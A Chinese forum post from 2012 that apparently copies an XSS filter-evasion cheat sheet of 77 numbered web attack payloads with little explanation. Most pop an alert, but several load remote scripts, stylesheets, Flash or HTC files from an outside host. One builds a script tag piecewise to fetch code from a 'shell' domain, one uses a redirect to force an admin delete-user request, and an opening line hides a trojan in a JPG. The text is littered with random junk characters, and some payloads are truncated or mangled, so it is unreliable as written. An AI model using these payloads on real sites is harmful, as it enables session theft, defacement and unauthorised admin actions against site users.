跨站图片shell: F; |# P- k. W! Q5 ~
XSS跨站代码 <script>alert("")</script> ]0 |$ H4 S- q3 R8 i& _) J
( Y% h$ ?$ B4 k) \, h: h+ ]2 o将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马7 T4 _: J2 ~; ?9 w5 E6 N
+ v v8 V1 L% y2 A
/ z* z$ v7 l! \9 G6 I; }, ?
1 _! V9 p# P; ^% d/ O6 l/ B
1)普通的XSS JavaScript注入" N8 q4 C. p' m. N1 Q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- L: V. x) S0 s* g5 w( [$ R! d9 k9 i* Z' E& y4 Y3 w
(2)IMG标签XSS使用JavaScript命令( n- w( V! q3 _$ S k N1 r6 G
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
! f* l- Y: g& l! o# L( n# F8 w
(3)IMG标签无分号无引号
0 R! [+ c$ _& W4 I, u/ C<IMG SRC=javascript:alert(‘XSS’)>9 P6 @; Z$ j5 f+ ?7 d* z: b
: K0 _" ?, V# H* T# O" L q, s, j
(4)IMG标签大小写不敏感) s5 }1 ]/ W' _% v* v
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
/ {! p2 [. k" w/ _" [+ ?4 v, s) ]' X6 v2 b: s
(5)HTML编码(必须有分号)
$ c2 j' \4 x- v: @" A2 |: g$ [; R<IMG SRC=javascript:alert(“XSS”)>
2 d1 j( q8 z. I/ `$ L
3 E; Q& G& A8 R- d5 Z8 C(6)修正缺陷IMG标签! F2 ~- y* N2 s& i
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
1 k5 n& e0 |( W4 W# U
* ]3 K% G; u S0 A% d8 y(7)formCharCode标签(计算器)# n. I9 t/ Z! `7 l
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 E1 \, x3 W4 C" |4 N! `6 w" Y* E: U$ l' t/ p; C2 K
(8)UTF-8的Unicode编码(计算器)2 S! K9 M0 `0 i. _3 ]; l
<IMG SRC=jav..省略..S')>
7 n% d% E' f# p9 s2 C, C# E9 s L+ \4 w
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)& h; y- M' J) x* U$ {
<IMG SRC=jav..省略..S')>9 i c! ~- O _/ h R0 \
6 ?1 a' ]* t) Q0 W(10)十六进制编码也是没有分号(计算器)
+ {% X- j( V, l" e I+ g<IMG SRC=java..省略..XSS')>8 @: I) l: V6 P& s# \5 r# c, c
( z7 n8 b* Y$ s. ^3 G
(11)嵌入式标签,将Javascript分开
* ]2 S, J) u6 b5 U/ [8 E; W<IMG SRC=”jav ascript:alert(‘XSS’);”>3 y9 n3 v5 v4 s4 \8 v7 M1 Y1 v
. l7 m0 {; W7 j. Y- d(12)嵌入式编码标签,将Javascript分开
6 `1 n4 S/ ^# h$ v<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ C4 U* s- Z8 P( |3 b7 S5 y: N
% u' ?; n2 f% `) F8 G(13)嵌入式换行符0 Y+ f5 ?. w: Q; \& V
<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 k7 S; M+ q+ Q4 J4 D9 w6 ^/ [% k3 i# o$ c. e$ |- p0 T; Y: R3 q* k% d
(14)嵌入式回车
8 w( q( T% H+ q, A<IMG SRC=”jav ascript:alert(‘XSS’);”>, c. m( N" L w9 J% u' g( U
5 m [# \$ o7 N d
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
0 q+ R* g1 G) w# d J: y<IMG SRC=”javascript:alert(‘XSS‘)”>( d" i p \: {8 r) b1 H
; w) M8 ]6 K" J6 B7 X1 j! A6 M& z4 `
(16)解决限制字符(要求同页面)
+ S5 Y" ]8 K- O% {. S: h1 b, o: C+ p<script>z=’document.’</script>0 A5 G5 O' f5 I' M
<script>z=z+’write(“‘</script>
" M/ {6 b9 g- | R7 ^$ c<script>z=z+’<script’</script>
3 P! a; X4 i, N<script>z=z+’ src=ht’</script> w) V4 y6 E/ f" G2 s4 d
<script>z=z+’tp://ww’</script>0 p7 l6 Q# B. H7 `; E7 K1 s
<script>z=z+’w.shell’</script>1 y' _& |* F {* X& B$ E9 T0 r& X/ s
<script>z=z+’.net/1.’</script>
2 D1 w. N1 m0 M<script>z=z+’js></sc’</script>- d I$ U* S! e. M3 [+ W4 ^
<script>z=z+’ript>”)’</script>- K2 T, U7 C1 ~* W2 H4 T5 V4 c- N
<script>eval_r(z)</script>. R& {* m8 K; C* B5 b1 c
& U; x3 Z% n/ M6 Z
(17)空字符
0 q2 F/ K3 u3 E, z8 r2 ^: R iperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out5 b4 Q4 h7 @- Y( e9 G" x
% j$ C b: X5 C, E4 {+ r$ _& W
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用6 L! f. l6 {. }4 o1 {
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
; J1 o2 @ a2 n( s
* Y% J; i8 k) \- _) A( @* q(19)Spaces和meta前的IMG标签
7 g7 K- Z$ |+ E- a+ Q9 h<IMG SRC=” javascript:alert(‘XSS’);”>- L5 R8 M" e# @! z
% X8 h$ E* @8 [
(20)Non-alpha-non-digit XSS
% {$ ~: k4 }3 A6 t6 C( L<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>0 @5 R: m) B; ~/ d. h) u
% a/ ]" O T _ y/ N& }3 m( Z
(21)Non-alpha-non-digit XSS to 2
. F7 L! C% ^' `: j! w. `- z( A<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>4 z1 I+ t/ a" C
5 X# @7 v) H# Z! ?+ c- @(22)Non-alpha-non-digit XSS to 30 [- F8 q% c7 a" c! f4 v
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
; t8 B8 z( [- y9 p) M/ M0 ]3 A( l
(23)双开括号
/ b: X$ b; n1 f- H m<<SCRIPT>alert(“XSS”);//<</SCRIPT>0 n+ Y8 h7 d) X3 Y5 A' w' d
5 s9 H f$ O! c; a(24)无结束脚本标记(仅火狐等浏览器); m: R+ L2 p) s9 y8 [" [
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
1 V( z/ u- M. }" i
4 S$ V, p, W( K J- |* J(25)无结束脚本标记2: n; X$ y+ l& o+ h# T8 [
<SCRIPT SRC=//3w.org/XSS/xss.js>
9 i% @ O( e3 r( D" l
+ G9 n/ ~* U: a1 @0 j(26)半开的HTML/JavaScript XSS" R+ f% j, y7 B" ]1 L8 S/ A; v7 c
<IMG SRC=”javascript:alert(‘XSS’)”
% p2 N( I: [$ X! t* Z
) `9 S) n# W, s4 r(27)双开角括号
) \# T9 ]. K6 Z! l<iframe src=http://3w.org/XSS.html <
' @- f4 }! t0 e5 f- W! d, T) w5 y; N! n$ [8 p- J6 ^$ Z; j
(28)无单引号 双引号 分号
; @% E% r! z( F; f5 b/ N/ @ z<SCRIPT>a=/XSS/1 P: e, x; a9 R7 m6 ~; w" g
alert(a.source)</SCRIPT>
% @9 Z' n3 Y1 q
* n2 W9 l: R$ K(29)换码过滤的JavaScript
+ k6 H- S0 J& N\”;alert(‘XSS’);//
' E0 |3 b$ f) r8 \; H) L# m, m* c- E* O
(30)结束Title标签
% `* C! r. B! f# B0 h0 l</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
; N: N P: h, u, k; u9 Y4 G$ l$ x6 N5 i: T4 Z* } d" s
(31)Input Image: ~( j: B6 F; L1 ?$ d
<INPUT SRC=”javascript:alert(‘XSS’);”>
, p, h+ b" y8 X) d1 L
$ {! U6 g( y$ e- J. y(32)BODY Image7 Q: N% t6 W8 o" U( H& y
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>: {( S* e* D& V) C; S
. d$ \+ M% K) _ s0 v6 M; k/ n p/ Q
(33)BODY标签
( L% ^8 s; J( x* X( C) ]* Z% j4 E<BODY(‘XSS’)>
1 [ d2 N. ?/ A5 ?2 s( Y6 d
2 Y0 }* |+ u' J# t7 O$ \: C(34)IMG Dynsrc
% \# Z5 r! D. Z5 ^# m# v<IMG DYNSRC=”javascript:alert(‘XSS’)”>, t6 o2 {' `+ I3 C8 B
0 X$ z; R4 E# B- ~$ o(35)IMG Lowsrc w3 N7 U* Q$ `: Q5 k% Z$ E$ }
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
. ` s& ?# d6 K! ~
! m. N: J" |# m. h2 u$ y( r(36)BGSOUND
& U! F- X' c* w<BGSOUND SRC=”javascript:alert(‘XSS’);”>
7 t. g; j$ o- z+ O @, G {6 } |7 J; j j1 I& e
(37)STYLE sheet8 m! m* k6 k9 @
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
1 [7 r5 O6 @+ n( B6 r
" q5 v5 {3 ~: S" R# F# @. B(38)远程样式表
# o+ J/ o1 J, F6 Z; a<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
% q U# d! Y" E3 A( }/ k& L4 m! X9 f$ i: C V6 D- ?6 u
(39)List-style-image(列表式)
1 R- P9 o$ K2 C# [3 V0 E6 j: s2 A<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS4 g( z1 }; {% K# |5 ^! X
# q4 D8 V( p/ _! h: \. i(40)IMG VBscript
, {$ h5 G7 H- j& Q1 H' x: j<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
6 G- p0 G, s: F- P) o& {1 t5 w I7 q; d& N/ {- Z; v
(41)META链接url
0 V! J/ i6 P5 h<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>7 Q- }$ c: X9 D0 N
: c) E' m% m( p. l5 Z(42)Iframe
# }" f9 @, ~+ x: C3 ?5 l<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>5 N0 b1 \: M+ L5 P) T
(43)Frame4 X s3 L0 u" z8 i0 b
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
( D) |+ c& L" ^3 x3 @; p; o' k4 x; b$ U4 M1 a3 n
(44)Table( s. [' X& m8 R
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>$ c* h# L4 H/ A
6 F0 ^0 t; } G, G4 o4 h' d; R
(45)TD
1 _" b6 ]( T9 v& _<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
: ~9 s, p% U- l0 R- N; s/ q7 c( y7 O: g+ ~6 `8 ]8 H
(46)DIV background-image
2 c- A. w2 H* x/ ` v<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>' u& T5 c1 I2 Q- D, E& {; z
8 _* w+ u( @ m* Q
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
- W& b+ p( _3 {1 {7 X7 h<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>: \7 R% D& \1 j5 q/ r
1 j/ K6 B) }/ q: s3 e+ U# e
(48)DIV expression
9 E Q) N: ^0 h6 p<DIV STYLE=”width: expression_r(alert(‘XSS’));”>' P) b* |; |, e% v( f, H7 g* S
1 e$ U$ |) X0 `2 b0 M
(49)STYLE属性分拆表达
( X6 `6 i- [) R' J<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>0 c! [; Q2 ]- c% Q! l2 \
$ T$ s8 e# G( A5 Z8 I(50)匿名STYLE(组成:开角号和一个字母开头)# q' v( e0 o3 _2 O4 ^0 I
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>2 r, d1 A' i# M! W9 q9 J$ Y
: C! B- c! c" f3 D2 L" Y5 y
(51)STYLE background-image1 D( }0 h: {; s9 E ]! ]* o. O% y
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>5 c; i. N* m4 F/ y1 E. N& E
9 m* o: x0 | m3 V; i
(52)IMG STYLE方式4 o! D& |$ f3 f; ~0 z$ q5 A+ I* t
exppression(alert(“XSS”))’>
3 ~" m, [2 q) j' D% b+ D! p# p# o5 }+ t4 J6 |* H7 r9 X% o
(53)STYLE background
. f& c% k: l" T2 s e( X<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
5 U2 B. x, m1 \. s
( Z4 _; g* |$ m(54)BASE
8 }1 f7 h% ^* o7 g<BASE HREF=”javascript:alert(‘XSS’);//”>
! `- E) W+ o" ]
3 b9 Z5 k. n; o' E(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS2 U0 Z" }( A9 w. R
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
: Q; b" {' r6 j5 {; z" O1 B' V7 ]
(56)在flash中使用ActionScrpt可以混进你XSS的代码" i6 P% N+ d, {9 X! o/ F9 G
a=”get”;/ H! E) X+ r& ~
b=”URL(\”";7 W1 K' H. w ^3 {
c=”javascript:”;
( t2 W. q* U ?* zd=”alert(‘XSS’);\”)”;4 x: \8 e# W5 |3 K
eval_r(a+b+c+d);
. z6 L. z* _+ ]2 G. e" y3 ]: i, }; f! w$ G
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上7 B8 g% E, M# L/ ^, w& \
<HTML xmlns:xss>
: o& H2 B- P0 Z7 _' w% A% E7 g<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>( Y* n4 @6 J" V1 {# e' a: d
<xss:xss>XSS</xss:xss>4 ]# p: _; h) n4 `4 K7 j
</HTML>% X, ]5 k: k9 o0 R
3 w3 C" s* x" H2 k4 A- s. ^" c9 B(58)如果过滤了你的JS你可以在图片里添加JS代码来利用 `8 k' N' z# k1 b* S
<SCRIPT SRC=””></SCRIPT>5 n( i5 [% C4 ]' l" p, a! ~' I
. H% t5 a* K' X9 ]6 m) l% o- c(59)IMG嵌入式命令,可执行任意命令& `6 W6 }" V4 j
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
! B! Q$ p! r. `
1 W. T8 L7 ]" q5 A/ n6 Z(60)IMG嵌入式命令(a.jpg在同服务器)
, p# W# m+ B. m- l$ I0 B5 o* C8 ^: Y- FRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
. O/ Q! j0 ?: I z, s( \7 {/ G2 P! r" `. @$ G; B+ i
(61)绕符号过滤3 ]7 K9 X" _/ D( A3 Q' f: r( x) R
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
/ t) e' o) u" k0 ^. f# x) P5 n) ]' l' b& S4 Q0 j7 v( h. `7 u i
(62)- J6 E5 c( Q" t
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
* o. d3 C9 S# m# o2 ~& k/ S
! X/ U% q8 f* @+ m" u, v(63)1 n3 U- l: Z2 @( T& K& M2 G0 X: _
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>; P/ n# R! v9 G* D' r3 {
2 e7 b7 u1 @& Q; `5 n( K2 c. J3 O
(64)
* s* v* t/ U9 p7 y. K H8 D9 x<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
# A8 z! j3 b. n9 ]' R$ Q* N: S$ g- {0 V: ]! Y
(65)
& n' ~: q* k( K% l- W<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
. q: c9 j- O: ^% l
) a1 @8 q& E* ]0 N+ Y* Y(66)
0 ?' U5 D. \/ ^* A* R- \- o! |<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>% v- R: @6 e, a" ^' k6 V& z
: V% y- H! d, N1 ^- s! U
(67)
- ^) @ X6 _ R/ |/ E<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>- m7 d# p" z2 x2 ~' z
; \5 I0 }0 D0 z6 \1 l }1 F& {' H* v( J(68)URL绕行
# ^4 Q% v9 O v- i7 y* z$ ~- L<A HREF=”http://127.0.0.1/”>XSS</A>) r7 t a" m! W
3 D8 }, Q) S' j7 V( @5 |
(69)URL编码6 \- M" I# z1 k
<A HREF=”http://3w.org”>XSS</A> Q; n& t- d1 Y4 ? r
. M! q6 @5 F* o% H. C- o0 D+ E" Y
(70)IP十进制
; p( E) ^* Y* J3 x% a<A HREF=”http://3232235521″>XSS</A>. e( r5 U" _0 F; V2 i7 X+ x( R
4 G( S$ c& H- E. Z0 r' c6 k(71)IP十六进制
- y- q& L( e6 c9 z/ _2 r! b<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
0 X% c/ C0 ?/ r' ]. B- @9 X' S' C5 ^3 R- s+ d8 {
(72)IP八进制" X* I1 H" ?7 g! w
<A HREF=”http://0300.0250.0000.0001″>XSS</A>9 i5 B. ^) X5 R' E( A/ i
/ J/ `3 b; Q! n7 _2 g
(73)混合编码% P- r) J3 x: H2 G0 g
<A HREF=”h% f0 z! b f# a* f
tt p://6 6.000146.0×7.147/”">XSS</A>
3 y( Z5 m$ G2 A v5 e. ]: w0 B; ?( D3 m' c: E: p. ^% b* b6 @
(74)节省[http:]
# H, P6 e6 M- _ |9 t<A HREF=”//www.google.com/”>XSS</A>3 F( |& G& p/ O( F) a C
& H, c3 @, W5 U `( H8 _+ F% J
(75)节省[www]
( ], P& B8 a: i) \# \9 F<A HREF=”http://google.com/”>XSS</A>
5 Y% ]% i; ^' S4 U$ n& _) K2 ]4 x1 \% ~4 q; i
(76)绝对点绝对DNS
3 I5 W3 ^- V: {: V. J- u D7 g5 ?<A HREF=”http://www.google.com./”>XSS</A>
1 [1 j& k, u2 l8 L l! g% d# h2 u4 Y1 [
(77)javascript链接
" l0 D9 k6 d8 C# g+ q$ X<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>7 r; K) @, h- o
|
发表于 2012-9-13 17:04:56
收藏
支持
反对